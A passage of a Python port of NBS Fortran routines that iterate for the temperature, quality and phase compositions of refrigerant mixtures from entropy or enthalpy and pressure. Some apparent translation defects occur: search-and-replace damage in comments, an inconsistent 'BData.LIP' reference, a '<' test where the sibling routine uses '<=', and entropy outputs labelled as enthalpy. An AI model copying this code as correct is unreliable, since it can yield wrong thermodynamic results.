COMMON / TOL / TOLR,ITmath.max,LUP\n\t\t# COMMON / TOLSH / TOLH,TOLS\n\t\t\n\t\tLVCON = False\n\n\t\tT1 = TSAT\n\t\tFT1 = S - SSAT\n\n\t\t#[P5, P6, P7, P8] = self.hcvcps (P1, P2, P3, P4)\n\t\t[HSAT, CV, CP, VSND] = self.hcvcps (4, T1, VSAT, X ) # CALL HCVCPS (4,T1,VSAT,X, HSAT,CV,CP,VSND)\n\n\t\tSSAT = self.entrop (T1,VSAT,X)\n\t\tT2 = TSAT + FT1 / CV\n\t\tV = VSAT\n\n\t\tfor IT in range(1, BData.ITMAX + 1 ): # DO 200 IT = 1,ITmath.max\n\t\t\t# [P4, P5] = self.espar [P1, P2, P3]\n\t\t\t[A, B] = self.espar (2, T2, X )\t\t\t\t\t#CALL espar (2,T2,X, A, B)\n\t\t\t#[P5, P7] = self.vit (P1, P2, P3, P4, P5, P6)\n\t\t\t[V, LVCON] = self.vit (T2, P, A, B, V, LLIQ)\t# CALL VIT (T2,P, A, B,V, LLIQ,LVCON)\n\n\t\t\tSSP = self.entrop (T2,V,X)\n\t\t\tFT2 = S - SSP\n\t\t\tif (abs(FT2) < BData.TOLS or abs(FT2 - FT1) < 0.02 * BData.TOLS):\n\t\t\t\treturn [T2, V]\n\n\t\t\tT3 = T2 - FT2 * (T2 - T1) / (FT2 - FT1)\n\t\t\tT1 = T2\n\t\t\tT2 = T3\n\t\t\tFT1 = FT2\n\n\t\tprint (BData.LUP, 'SINGLE PHASE ITERATION IN SPIN DID NOT CONVERGE' )\n\t\treturn [T2, V]\n\n\t# = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . \n\tdef hpxsp (self,H, P, X, TSAT, HSAT, VSAT, LLIQ): # T2,V, LLIQ\n\t\t# [T2,V] = self.hpxsp (H,P,X, TSAT, LLIQ)\n\t\t# [P7,P8] = self.hpxsp (P1,P2,P3, P4,P5,P6, P9 )\n\t\t#\t\t SUBROUTINE HPXSP (H,P,X, TSAT,HSAT,VSAT, T2,V,LLIQ)\n\t\t#\n\t\t# SUBROUTINE TO ITERATE FOR THE TEMPERATURE OF A SINGLE PHASE\n\t\t# BINARY MIXTURE GIVEN ENTHALPY, PRESSURE, AND COMPOSITION.\n\t\t# CALLED ONLY BY HPIN.\n\t\t\n\t\t#\t IMPLICIT REAL (A-H,O-Z)\n\t\t#\t DIMENSION X(5)\n\t\t#\t LOGICAL LLIQ,LVCON\n\t\t#\t COMMON /TOL/ TOLR,ITMAX,LUP\n\t\t#\t COMMON /TOLSH/ TOLH,TOLS\n\t\t\n\t\t\n\t\tT1 = TSAT\n\t\tFT1 = H - HSAT\n\t\t\n\t\t#[P5, P6, P7, P8] = self.hcvcps (P1, P2, P3, P4)\n\t\t[HSAT, CV, CP, VSND] = self.hcvcps ( 5, T1, VSAT, X ) # CALL HCVCPS (5,T1,VSAT,X, HSAT ,CV,CP,VSND)\n\n\t\tT2 = TSAT + FT1 / CP\n\t\tV = VSAT\n\n\t\tfor IT in range (1, BData.ITMAX + 1) : # DO 200 IT=1,ITMAX\n\t\t\t# [P4, P5] = self.espar [P1, P2, P3]\n\t\t\t[A, B] = self.espar(2, T2, X ) #CALL espar (2,T2,X,A,B)\n\t\t\t\n\t\t\t#[P5, P7] = self.vit (P1, P2, P3, P4, P5, P6)\n\t\t\t[V, LVCON ] = self.vit (T2,P,A,B,V, LLIQ)\t#CALL VIT (T2,P,A,B,V, LLIQ,LVCON)\n\t\t\t\n\t\t\t#[P5, P6, P7, P8] = self.hcvcps (P1, P2, P3, P4)\n\t\t\t[HSP, CV, CP, VSND] = self.hcvcps ( 1, T2, V, X ) \t# CALL HCVCPS (1,T2,V,X, HSP,CV,CP,VSND)\n\n\t\t\tFT2 = H - HSP\n\t\t\t\n\t\t\tif (abs(FT2) < BData.TOLH or abs(FT2-FT1) < 0.02 * BData.TOLH):\n\t\t\t\treturn [T2,V]\n\n\t\t\tT3 = T2 - FT2 * (T2-T1) / (FT2-FT1)\n\t\t\tT1 = T2\n\t\t\tT2 = T3\n\t\t\tFT1 = FT2\n\n\t\tprint (BData.LUP,'SINGLE PHASE ITERATION IN HPIN DID NOT CONVERGE')\n\t\treturn [T2,V]\n\n\t# = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . \n\tdef spin (self, S,P,X ): # T,XQ,XL,XV,VL,VV,SL,SV\n\t\t# [P4 .. P11] = self.spin (P1, P2, P3 )\n\t\t# [T,XQ,XL,XV,VL,VV,SL,SV] = self.spin (self, S,P,X )\n\t\t#\t SUBROUTINE SPIN (S,P,X,T,XQ,XL,XV,VL,VV,SL,SV)\n\t\t#\n\t\t# DEVELOPED BY MARK MCLINDEN AND GRAHAM MORRISON AT THE\n\t\t# NATIONAL BUREAU OF STANDARDS WITH FUNDING FROM THE ELECTRIC\n\t\t# POWER RESEARCH INSTITUTE AND NBS.\n\t\t#\n\t\t# THIS ROUTINE CALCULATES THE TEMPERATURE AND QUALITY OF .A SINGLE\n\t\t# OR TWO - PHASE MIXTURE GIVEN THE PRESSURE AND THE OVERALL (BULK)\n\t\t# ENTROPY AND COMPOSITION\n\t\t#\n\t\t# INPUTS:\n\t\t# S - ENTROPY (KJ / KMOL K) OF BULK MIXTURE\n\t\t# P - PRESSURE (KPA)\n\t\t# X - BULK COMPOSITION (MOLE FRACTION)\n\t\t#\n\t\t# OUTPUTS:\n\t\t# T - EQUILIBRIUM TEMPERATURE OF SYSTEM (K)\n\t\t# XQ - EQUILIBRIUM QUALITY (MOLAR BASIS), NEGATIVE VALUES INDICATE\n\t\t# SUBCOOLED LIQUID. QUALITIES > 1 INDICATE SUPERHEATED VAPOR.\n\t\t# NOTE: THE QUALITIES COMPUTED FOR SINGLE PHASE CONDITIONS IN\n\t\t# THE ROUTINES HPIN, HTIN, SPIN, AND VTIN WILL NOT BE THE SAME.\n\t\t# XL - COMPOSITION OF LIQUID PHASE (MOLE FRACTION)\n\t\t# XV - COMPOSITION OF VAPOR PHASE (MOLE FRACTION)\n\t\t# VL - MOLAR VOLUME OF LIQUID PHASE (M**3/KMOL)\n\t\t# VV - MOLAR VOLUME OF VAPOR PHASE (M**3/KMOL)\n\t\t# SL - MOLAR ENTHALPY OF LIQUID PHASE (KJ/KMOL K)\n\t\t# SV - MOLAR ENTHALPY OF VAPOR PHASE (KJ/KMOL K)\n\t\t# NOTE: if ONLY SUBCOOLED LIQUID IS PRESENT, VV AND HV ARE\n\t\t# COMPUTED AT THE BUBBLE POINT TEMPERATURE AND VAPOR COMPOSITION\n\t\t# IN EQUILIBRIUM WITH SATURATED LIQUID AT THE GIVEN P, XL.\n\t\t# if ONLY SUPERHEATED VAPOR IS PRESENT, VL AND HV ARE\n\t\t# COMPUTED AT THE DEWPOINT TEMPERATURE AND LIQUID\n\t\t# COMPOSITION IN EQUILIBRIUM WITH SATURATED VAPOR AT THE\n\t\t# GIVEN P, XV.\n\t\t#\n\t\t#\t IMPLICIT REAL (BData.A - H,O - Z)\n\t\t#\t LOGICAL LCRIT,LCONV\n\t\t#\t DIMENSION X(5),XL(5),XV(5),XLB(5),XVB(5),XLD(5),XVD(5)\n\t\t#\t COMMON / NCOMP / BData.NC\n\t\t#\t COMMON / TOL / TOLR,ITMAX,LUP\n\t\t#\t COMMON / TOLSH / TOLH,TOLS\n\t\t#\n\t\t# COMPUTE BUBBLE AND DEW POINTS AT GIVEN CONDITIONS OF P AND X\n\t\t#\n\t\tLCRIT = False\n\t\tLCONV = False\n\t\tT=0.0\n\t\tXL = [0.0] * (5+1)\n\t\tXV = [0.0] * (5+1)\n\n\t\tXLB= [0.0] * (5+1)\n\t\tXVB= [0.0] * (5+1)\n \n\t\tXLD= [0.0] * (5+1)\n\t\tXVD= [0.0] * (5+1)\n\t\t\n\t\t#VVBUB = VVBUB # in Python only\n\t\t\n\t\t\n\t\t# [P2, P3 ,P4, P5, P6, P8] = self.bublp (P1, P2, P3 , P7 )\n\t\t[_, XV, TBUB, VL, VVBUB, LCRIT] = self.bublp ( P, X, XV, True) \t# CALL BUBLP (P,X,XV, TBUB, VL, VVBUB, True,LCRIT) \n\t\t[XL,_, TDEW, VLDEW, VV, LCRIT] = self.bublp ( P, XL, X, False)\t# CALL BUBLP (P,XL,X, TDEW,VLDEW,VV, False ,LCRIT)\n\t\t\n\t\tVLBUB = VL # in Python only # in Python only\n\t\t\n\t\tSL = self.entrop (TBUB, VL, X)\n\t\tSV = self.entrop (TDEW, VV, X)\n\t\t\n\t\t# WRITE ( * , * ) 'TBUB,TDEW,SLBUB,SVDEW ',TBUB,TDEW,SL,SV\n\t\tif (S <= SL) :\n\t\t\t# SINGLE PHASE LIQUID\n\t\t\t#\n\t\t\tXL = X[:]\n\t\t\t#for I in range(1, BData.NC + 1): # DO 120 I = 1,BData.NC\n\t\t\t#\tXL[I] = X[I]\n\t\t\t\t\n\t\t\tVV = VVBUB\n\t\t\tVLBUB = VL\n\t\t\t#[p7,p8,p9]= self.spxsp(p1 to p6)\n\t\t\t[T,VL]= self.spxsp(S,P,X, TBUB,SL,VLBUB, True)\n\t\t\t#CALL SPXSP (S,P,X, TBUB,SL,VLBUB, T,VL, .TRUE.)\n\t\t\t\t\n\t\telif (S >= SV) :\n\t\t\t# SINGLE PHASE VAPOR\n\t\t\t#\n\t\t\tXV = X[:]\n\t\t\t#for I in range(1,BData.NC): # DO 140 I = 1,BData.NC\n\t\t\t#\tXV[I] = X[I]\n\t\t\t\t\n\t\t\tVL = VLDEW\n\t\t\tVVDEW = VV\n\t\t\t\n\t\t\t[T,VV]= self.spxsp(S,P,X, TDEW,SV,VVDEW, False)\n\t\t\t# CALL SPXSP (S,P,X, TDEW,SV,VVDEW, T,VV,.FALSE.)\n\t\t\t\n\t\telse:\n\t\t\t# TWO PHASE\n\t\t\t#\n\t\t\tNCC = BData.NC\n\t\t\tfor I in range(1, BData.NC + 1): # DO 210 I = 1,BData.NC\n\t\t\t\tif (X[I] < BData.TOLR):\n\t\t\t\t\tNCC = NCC - 1\n\t\t\t\t\t\n\t\t\t\tXLB[I] = X[I]\n\t\t\t\tXVB[I] = XV[I]\n\t\t\t\tXLD[I] = XL[I]\n\t\t\t\tXVD[I] = X[I]\n\t\t\t\t#210 CONTINUE\n\t\t\t\t\n\t\t\tSLB = SL\n\t\t\tSVD = SV\n\t\t\tSVB = self.entrop (TBUB,VVBUB,XVB)\n\t\t\tSLD = self.entrop (TDEW,VLDEW,XLD)\n\t\t\t\n\t\t\tb_python_flag = False\n\t\t\tfor IT in range(1, int(BData.ITMAX/2) + 1):\t# DO 260 IT = 1,ITMAX / 2\n\t\t\t\t#\n\t\t\t\t# COMPUTE QUALITY BASED ON ENTHALPY; COMPUTED SEPARATELY FOR\n\t\t\t\t# BUBBLE AD DEW POINT CONDITIONS.\n\t\t\t\t#\n\t\t\t\tXQSB = (S - SLB) / (SVB - SLB)\n\t\t\t\tXQSD = (S - SLD) / (SVD - SLD)\n\t\t\t\t#\n\t\t\t\t# COMPUTE LENGTH OF TIE LINE CONNECTING LIQUID AND VAPOR\n\t\t\t\t# COMPOSITIONS AND QUALITIES BASED ON COMPOSITION.\n\t\t\t\t#\n\t\t\t\tIXQCB = 0\n\t\t\t\tIXQCD = 0\n\t\t\t\tXQCB = 0.0\n\t\t\t\tXQCD = 0.0\n\t\t\t\tTLINEB = 0.0\n\t\t\t\tTLINED = 0.0\n\t\t\t\t\n\t\t\t\tfor I in range(1, BData.NC + 1): # DO 214 I = 1,BData.NC\n\t\t\t\t\tif (XLB[I] != XVB[I]):\n\t\t\t\t\t\tIXQCB = IXQCB + 1\n\t\t\t\t\t\tXQCB = XQCB + ( X[I] - XLB[I] ) / ( XVB[I] - XLB[I] )\n\t\t\t\t\t\n\t\t\t\t\tTLINEB = TLINEB + ( XVB[I] - XLB[I] ) **2\n\t\t\t\t\t\n\t\t\t\t\tif (XLD[I] != XVD[I] ) :\n\t\t\t\t\t\tIXQCD = IXQCD + 1\n\t\t\t\t\t\tXQCD = XQCD + ( X[I] - XLD[I] ) / ( XVD[I] - XLD[I] )\n\t\t\t\t\t\n\t\t\t\t\tTLINED = TLINED + (XVD[I] - XLD[I] ) **2\n\t\t\t\t\t#214 CONTINUE\n\t\t\t\t\t\n\t\t\t\tif (IXQCB > 0) :\n\t\t\t\t\t#XQCB = XQCB / REAL(IXQCB)\n\t\t\t\t\tXQCB = XQCB / (IXQCB + 0.0)\n\t\t\t\t\t\n\t\t\t\telse:\n\t\t\t\t\tXQCB = XQSB\n\t\t\t\t\n\t\t\t\tif (IXQCD > 0):\n\t\t\t\t\t#XQCD = XQCD / REAL(IXQCD)\n\t\t\t\t\tXQCD = XQCD / (IXQCD + 0.0)\n\t\t\t\telse:\n\t\t\t\t\tXQCD = XQSD\n\t\t\t\t\n\t\t\t\tTLINEB = math.sqrt(TLINEB)\n\t\t\t\tTLINED = math.sqrt(TLINED)\n\t\t\t\t#\n\t\t\t\t# CHECK FOR CONVERGENCE\n\t\t\t\t#\n\t\t\t\tLCONV = True\n\t\t\t\tfor I in range(1, BData.NC + 1): # DO 220 I = 1,BData.NC\n\t\t\t\t\tif ( abs ( XVB[I] - XVD[I] ) > 0.0001):\n\t\t\t\t\t\tLCONV = False\n\t\t\t\t\t\n\t\t\t\tif (abs(XQCB - XQSB) > 0.0001):\n\t\t\t\t\tLCONV = False\n\t\t\t\t\t\n\t\t\t\tif (abs(XQCD - XQSD) > 0.0001):\n\t\t\t\t\tLCONV = False\n\t\t\t\t\t\n\t\t\t\tif (LCONV):\n\t\t\t\t\tb_python_flag = True\n\t\t\t\t\tbreak\t# GOTO 280\n\t\t\t\t#\n\t\t\t\t# ASSIGN WEIGHTS TO BUBBLE AND DEW POINT CALCULATION\n\t\t\t\t#\n\t\t\t\tif (IT <= 1 or NCC <= 2) :\n\t\t\t\t\tWTB = 1.0 + (XQCB - XQSB) / ((XQCD - XQSD) - (XQCB - XQSB))\n\t\t\t\t\tWTD = 1.0 - (XQCD - XQSD) / ((XQCD - XQSD) - (XQCB - XQSB))\n\t\t\t\t\t\n\t\t\t\telse:\n\t\t\t\t\tDTSUMB = 0.0\n\t\t\t\t\tDTSUMD = 0.0\n\t\t\t\t\t\n\t\t\t\t\tfor J in range(1, (BData.NC-1) + 1): \t\t# DO 222 J = 1,BData.NC - 1\n\t\t\t\t\t\tfor K in range( J+1 , BData.NC +1 ):\t\t# DO 222 K = J + 1,BData.NC\n\t\t\t\t\t\t\tDTSUMB = DTSUMB + ( ( X[J] - XLB[J] ) * ( XVB[K] - XLB[K] ) \t\\\n\t\t\t\t\t\t\t\t- ( X[K] - XLB[K] ) * ( XVB[J] - XLB[J] ) ) ** 2\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tDTSUMD = DTSUMD + ( ( X[J] - XLD[J] ) * ( XVD[K] - XLD[K] )\t\t\\\n\t\t\t\t\t\t\t\t- ( X[K] - XLD[K] ) * ( XVD[J] - XLD[J] ) ) ** 2\n\t\t\t\t\t\t\t# 222 CONTINUE\n\t\t\t \n\t\t\t\t\tDXBUB = 0.0\n\t\t\t\t\tDXDEW = 0.0\n\t\t\t\t\t\n\t\t\t\t\tfor I in range( 1, BData.NC +1 ): # DO 223 I = 1,BData.NC\n\t\t\t\t\t\tDXBUB = DXBUB + ( XLB[I] - XVB[I]) ** 2\n\t\t\t\t\t\tDXDEW = DXDEW + ( XLD[I] - XVD[I]) ** 2\n\t\t\t \n\t\t\t\t\tDXBUB = math.sqrt(DTSUMB / DXBUB)\n\t\t\t\t\tDXDEW = math.sqrt(DTSUMD / DXDEW)\n\t\t\t\t\t\n\t\t\t\t\tWTB = DXDEW / (DXDEW + DXBUB)\n\t\t\t\t\tWTD = DXBUB / (DXBUB + DXDEW)\n\t\t\t\t#END if\n\n\t\t\t\tif (TLINEB / TLINED > 2.0 or TLINEB / TLINED < 0.5) :\n\t\t\t\t\tTLAVG = min(TLINEB, TLINED)\n\t\t\t\t\t\n\t\t\t\telse:\n\t\t\t\t\tTLAVG = (WTB * TLINEB + WTD * TLINED)\n\t\t\t\t\n\t\t\t\t#\n\t\t\t\t# COMPUTE NEXT GUESSES FOR COMPOSITION OF LIQUID AND VAPOR\n\t\t\t\t# AND CARRY OUT CORRESPONDING BUBBLE AND DEW POINT CALCULATIONS.\n\t\t\t\t#\n\t\t\t\t\n\t\t\t\tfor I in range(1, BData.NC + 1): # DO 224 I = 1,BData.NC\n\t\t\t\t\tXLB2I = X[I] + TLAVG * (WTB * XQSB + WTD * XQSD)\t\\\n\t\t\t\t\t\t* (WTB * (XLB[I] - XVB[I]) / TLINEB + WTD * (XLD[I] - XVD[I]) / TLINED)\n\t\t\t\t\t\t\n\t\t\t\t\tXVD2I = X[I] - TLAVG * (WTB * (1.0 - XQSB) + WTD * (1.0 - XQSD))\t\\\n\t\t\t\t\t\t* (WTB * (XLB[I] - XVB[I]) / TLINEB + WTD * (XLD[I] - XVD[I]) / TLINED)\n\t\t\t\t \n\t\t\t\t\tXLB[I] = XLB2I\n\t\t\t\t\tXVD[I] = XVD2I\n\t\t\t\t\t# 224 CONTINUE\n\t\t\t\t\n\t\t\t\t# [P2, P3 ,P4, P5, P6, P8] = self.bublp (P1, P2, P3 , P7 )\n\t\t\t\t[_, XVB, TBUB, VLBUB, VVBUB, LCRIT] = self.bublp ( P, XLB, XVB, True) # CALL BUBLP (P,XLB,XVB, TBUB,VLBUB,VVBUB, True, LCRIT)\n\t\t\t\t[XLD, _, TDEW, VLDEW, VVDEW, LCRIT] = self.bublp ( P, XLD, XVD, False)# CALL BUBLP (P,XLD,XVD, TDEW, VLDEW,VVDEW, False ,LCRIT)\n\t\t\t\t\n\t\t\t\tSLB = self.entrop (TBUB,VLBUB, XLB)\n\t\t\t\tSVB = self.entrop (TBUB,VVBUB, XVB)\n\t\t\t\tSLD = self.entrop (TDEW,VLDEW, XLD)\n\t\t\t\tSVD = self.entrop (TDEW,VVDEW, XVD)\n\n\t\t\t\t# 260 CONTINUE\n\t\t\t\t\n\t\t\t# WRITE (LUP,1000) S,P, (X(I),I = 1,BData.NC)\n\t\t\tif not b_python_flag :\n\t\t\t\tprint (BData.LIP, \"ROUTINE SPIN DID NOT CONVERGE S, P, X\",S, P, X[1:BData.NC] )\n\t\t\t\n\t\t\t# 280\tCONTINUE\n\t\t\t\n\t\t\t#\n\t\t\t# SOLUTION HAS CONVERGED; WRITE OUTPUT VARIABLES.\n\t\t\t#\n\t\t\tXL = XLB[:]\n\t\t\tXV = XVB[:]\n\t\t\t\n\t\t\t#for I in range(1,BData.NC): # DO 284 I = 1,BData.NC\n\t\t\t#\tXL[I] = XLB[I]\n\t\t\t#\tXV[I] = XVB[I]\n\t\t\n\t\t\tVL = VLBUB\n\t\t\tVV = VVBUB\n\t\t\tSL = SLB\n\t\t\tSV = SVB\n\t\t\tT = TBUB\n\t\t\t\n\t\t\t# ---END if\n\t\tXQ = (S - SL) / (SV - SL)\n\t\treturn [T, XQ,XL,XV, VL,VV, SL,SV]\n\n\t# = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . \n\tdef hpin (self, H,P,X ):\n\t\t# [T, XQ,XL,XV,VL,VV,HL,HV] = hpin ( H,P,X )\n\t\t# [P4, P5, P6, P7, P8, P9, P10, P11] = self.hpin ( P1,P2,P3 )\n\t\t# SUBROUTINE HPIN (H,P,X, T,XQ,XL,XV,VL,VV,HL,HV)\n\t\t#\n\t\t# DEVELOPED BY MARK MCLINDEN AND GRAHAM MORRISON AT THE\n\t\t# NATIONAL BUREAU OF STANDARDS WITH FUNDING FROM THE ELECTRIC\n\t\t# POWER RESEARCH INSTITUTE AND NBS.\n\t\t#\n\t\t# THIS ROUTINE CALCULATES THE TEMPERATURE AND QUALITY OF A SINGLE\n\t\t# OR TWO-PHASE MIXTURE GIVEN THE PRESSURE AND THE OVERALL (BULK)\n\t\t# ENTHALPY AND COMPOSITION\n\t\t#\n\t\t# INPUTS:\n\t\t# H - ENTHALPY (KJ/KMOL) OF BULK MIXTURE\n\t\t# P - PRESSURE (KPA)\n\t\t# X - BULK COMPOSITION (MOLE FRACTION)\n\t\t#\n\t\t# OUTPUTS:\n\t\t# T - EQUILIBRIUM TEMPERATURE OF SYSTEM (K)\n\t\t# XQ - EQUILIBRIUM QUALITY (MOLAR BASIS), NEGATIVE VALUES INDICATE\n\t\t# SUBCOOLED LIQUID. QUALITIES > 1 INDICATE SUPERHEATED VAPOR.\n\t\t# NOTE: THE QUALITIES COMPUTED FOR SINGLE PHASE CONDITIONS IN\n\t\t# THE ROUTINES HPIN, HTIN, SPIN, AND VTIN WILL NOT BE THE SAME.\n\t\t# XL - COMPOSITION OF LIQUID PHASE (MOLE FRACTION)\n\t\t# XV - COMPOSITION OF VAPOR PHASE (MOLE FRACTION)\n\t\t# VL - MOLAR VOLUME OF LIQUID PHASE (M**3/KMOL)\n\t\t# VV - MOLAR VOLUME OF VAPOR PHASE (M**3/KMOL)\n\t\t# HL - MOLAR ENTHALPY OF LIQUID PHASE (KJ/KMOL)\n\t\t# HV - MOLAR ENTHALPY OF VAPOR PHASE (KJ/KMOL)\n\t\t# NOTE: IF ONLY SUBCOOLED LIQUID IS PRESENT, VV AND HV ARE\n\t\t# COMPUTED AT THE BUBBLE POINT TEMPERATURE AND VAPOR COMPOSITION\n\t\t# IN EQUILIBRIUM WITH SATURATED LIQUID AT THE GIVEN P, XL.\n\t\t# IF ONLY SUPERHEATED VAPOR IS PRESENT, VL AND HL ARE\n\t\t# COMPUTED AT THE DEWPOINT TEMPERATURE AND LIQUID\n\t\t# COMPOSITION IN EQUILIBRIUM WITH SATURATED VAPOR AT THE\n\t\t# GIVEN P, XV.\n\t\t#\n\t\n\t\t#LOGICAL LCRIT,LCONV\n\t\t#DIMENSION X(5),XL(5),XV(5),XLB(5),XVB(5),XLD(5),XVD(5)\n\t\t#COMMON /NCOMP/ NC\n\t\t#COMMON /TOL/ TOLR,ITMAX,LUP\n\t\t#COMMON /TOLSH/ TOLH,TOLS\n\t\t#\n\t\t# COMPUTE BUBBLE AND DEW POINTS AT GIVEN CONDITIONS OF P AND X\n\t\t#\n\t\t\n\t\t#X = [[0.0] * (5+1)]\n\t\tXL = [0.0] * (5+1)\n\t\tXV = [0.0] * (5+1)\n\t\t\n\t\tXLB = [0.0] * (5+1)\n\t\tXVB = [0.0] * (5+1)\n\t\t\n\t\tXLD = [0.0] * (5+1)\n\t\tXVD = [0.0] * (5+1)\n\t\t\n\t\t# [P2, P3, P4, P5, P6, P8] = bublp ( P1, P2, P3, P7)\n\t\t[X, XV, TBUB, VL, VVBUB, LCRIT] = self.bublp (P, X, XV, True) # CALL BUBLP (P,X,XV ,TBUB, VL,VVBUB, .TRUE.,LCRIT)\t\t\n\t\t[XL,X, TDEW, VLDEW, VV, LCRIT] = self.bublp (P, XL, X, False) # CALL BUBLP (P,XL,X, TDEW,VLDEW,VV,.FALSE.,LCRIT)\n\t\t\n\t\tVLBUB = VL # in Python only\n\t\t\n\t\t#[P5, P6, P7, P8] = self.hcvcps (P1, P2, P3, P4)\n\t\t[HL, CV, CP, VSND] = self.hcvcps( 1, TBUB, VL, X )\t# CALL HCVCPS (1,TBUB,VL,X, HL,CV,CP,VSND)\n\t\t[HV, CV, CP, VSND] = self.hcvcps( 1, TDEW, VV, X )\t# CALL HCVCPS (1,TDEW,VV,X ,HV,CV,CP,VSND)\n\t\t\n\t\tif (H <= HL) :\n\t\t\t# SINGLE PHASE LIQUID\n\t\t\t#for I in range(1, BData.NC + 1): # DO 120 I=1,NC\n\t\t\t#\tXL[I] = X[I]\n\n\t\t\tXL = X[:]\n\t\t\tVV = VVBUB\n\t\t\tVLBUB = VL\n\t\t\t\n\t\t\t#[P7,P8] = self.hpxsp (P1,P2,P3, P4,P5,P6, P9)\n\t\t\t[T, VL] =self.hpxsp (H, P, X, TBUB, HL, VLBUB, True) #CALL HPXSP (H,P,X,TBUB,HL,VLBUB,T,VL,.TRUE.)\n\t\t\t\n\t\telif (H >= HV) :\n\t\t\t# SINGLE PHASE VAPOR\n\t\t\t#for I in range(1, BData.NC + 1): # DO 140 I=1,NC\n\t\t\t#\tXV[I] = X[I]\n\n\t\t\tXV = X[:]\n\t\t\tVL = VLDEW\n\t\t\tVVDEW= VV\n\t\t\t\n\t\t\t#[P7,P8] = self.hpxsp (P1,P2,P3, P4,P5,P6,P9 )\n\t\t\t[T, VV] = self.hpxsp (H, P, X, TDEW, HV, VVDEW, False) #CALL HPXSP (H,P,X,TDEW,HV,VVDEW,T,VV,.FALSE.)\n\t\t\t\n\t\telse:\n\n\t\t\t# TWO PHASE\n\t\t\tNCC = BData.NC\n\t\t\tfor I in range(1, BData.NC + 1): # DO 210 I=1,NC\n\t\t\t\tif (X[I] < BData.TOLR): NCC = NCC-1\n\t\t\t\t\n\t\t\t\tXLB[I] = X [I]\n\t\t\t\tXVB[I] = XV[I]\n\t\t\t\t\n\t\t\t\tXLD[I] = XL[I]\n\t\t\t\tXVD[I] = X [I]\n\t\t\t\t\n\t\t\tHLB = HL\n\t\t\tHVD = HV\n\t\t\t\n\t\t\t#[P5, P6, P7, P8] = self.hcvcps (P1, P2, P3, P4)\n\t\t\t[HVB, CV, CP, VSND] = self.hcvcps( 1, TBUB, VVBUB, XVB ) # CALL HCVCPS (1,TBUB,VVBUB,XVB ,HVB,CV,CP,VSND)\n\t\t\t[HLD, CV, CP, VSND] = self.hcvcps( 1, TDEW, VLDEW, XLD) # CALL HCVCPS (1,TDEW,VLDEW,XLD ,HLD,CV,CP,VSND)\n\t\t\t\n\t\t\tb_python_flag = False\n\t\t\tfor IT in range(1, int(BData.ITMAX/2 + 1)): #DO 260 IT=1,ITMAX/2\n\t\t\t\t# COMPUTE QUALITY BASED ON ENTHALPY; COMPUTED SEPARATELY FOR\n\t\t\t\t# BUBBLE AD DEW POINT CONDITIONS.\n\t\t\t\t#\n\t\t\t\tXQHB = (H-HLB) / (HVB-HLB)\n\t\t\t\tXQHD = (H-HLD) / (HVD-HLD)\n\t\t\t\t#\n\t\t\t\t# COMPUTE LENGTH OF TIE LINE CONNECTING LIQUID AND VAPOR\n\t\t\t\t# COMPOSITIONS AND QUALITIES BASED ON COMPOSITION.\n\t\t\t\t#\n\t\t\t\tIXQCB = 0\n\t\t\t\tIXQCD = 0\n\t\t\t\tXQCB = 0.0\n\t\t\t\tXQCD = 0.0\n\t\t\t\tTLINEB= 0.0\n\t\t\t\tTLINED= 0.0\n\t\t\t\t\n\t\t\t\tfor I in range(1, BData.NC + 1): #DO 214 I=1,NC\n\t\t\t\t\tif (XLB[I] != XVB[I] ):\n\t\t\t\t\t\tIXQCB = IXQCB + 1\n\t\t\t\t\t\tXQCB = XQCB +( X[I] - XLB[I] ) / ( XVB[I] - XLB[I] )\n\n\t\t\t\t\tTLINEB = TLINEB + ( XVB[I] - XLB[I] ) **2\n\t\t\t\t\t\n\t\t\t\t\tif (XLD[I] != XVD[I] ) :\n\t\t\t\t\t\tIXQCD = IXQCD + 1\n\t\t\t\t\t\tXQCD = XQCD + ( X[I] - XLD[I] ) / ( XVD[I] - XLD[I] )\n\t\t\t\t\t\t\n\t\t\t\t\tTLINED = TLINED + (XVD[I] - XLD[I] ) **2\n\t\t\t\t\t\n\t\t\t\tif (IXQCB > 0) :\n\t\t\t\t\tXQCB = XQCB / (IXQCB )\n\t\t\t\t\t\n\t\t\t\telse:\n\t\t\t\t\tXQCB=XQHB\n\t\t\t\t\n\t\t\t\tif (IXQCD > 0) :\n\t\t\t\t\tXQCD=XQCD / (IXQCD )\n\t\t\t\t\t\n\t\t\t\telse:\n\t\t\t\t\tXQCD=XQHD\n\t\t\t\t\n\t\t\t\tTLINEB = math.sqrt(TLINEB)\n\t\t\t\tTLINED = math.sqrt(TLINED)\n\t\t\t\t#\n\t\t\t\t# CHECK FOR CONVERGENCE\n\t\t\t\t#\n\t\t\t\tLCONV = True\n\t\t\t\tfor I in range (1, BData.NC + 1): # DO 220 I=1,NC\n\t\t\t\t\tif (abs(XVB[I] - XVD[I] ) > 0.0001): LCONV = False\n\t\t\t\t\t\n\t\t\t\tif (abs(XQCB-XQHB) > 0.0001): LCONV = False\n\t\t\t\tif (abs(XQCD-XQHD) > 0.0001): LCONV = False\n\t\t\t\t\n\t\t\t\tif (LCONV):\n\t\t\t\t\tb_python_flag = True\n\t\t\t\t\tbreak\t#GOTO 280\n\t\t\t\t\n\t\t\t\t#\n\t\t\t\t# ASSIGN WEIGHTS TO BUBBLE AND DEW POINT CALCULATION\n\t\t\t\t#\n\t\t\t\tif (IT < 1 or NCC < 2) :\n\t\t\t\t\tWTB = 1.0 + (XQCB-XQHB) / ( (XQCD-XQHD) - (XQCB-XQHB) )\n\t\t\t\t\tWTD = 1.0 - (XQCD-XQHD) / ( (XQCD-XQHD) - (XQCB-XQHB) )\n\t\t\t\telse:\n\t\t\t\t\tDTSUMB = 0.0\n\t\t\t\t\tDTSUMD = 0.0\n\t\t\t\t\t\n\t\t\t\t\tfor J in range (1, (BData.NC-1) + 1):\t#DO 222 J=1,NC-1\n\t\t\t\t\t\tfor K in range (J+1, (BData.NC + 1) ): #DO 222 K=J+1,NC\n\t\t\t\t\t\t\tDTSUMB = DTSUMB + ((X[J] - XLB[J] ) * ( XVB[K] - XLB[K])\t\\\n\t\t\t\t\t\t\t\t- (X[K] - XLB[K]) * (XVB[J] - XLB[J] ) )**2\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tDTSUMD = DTSUMD + ((X[J] - XLD[J] ) * ( XVD[K] - XLD[K])\t\\\n\t\t\t\t\t\t\t\t- (X[K] - XLD[K]) * (XVD[J] - XLD[J] ) 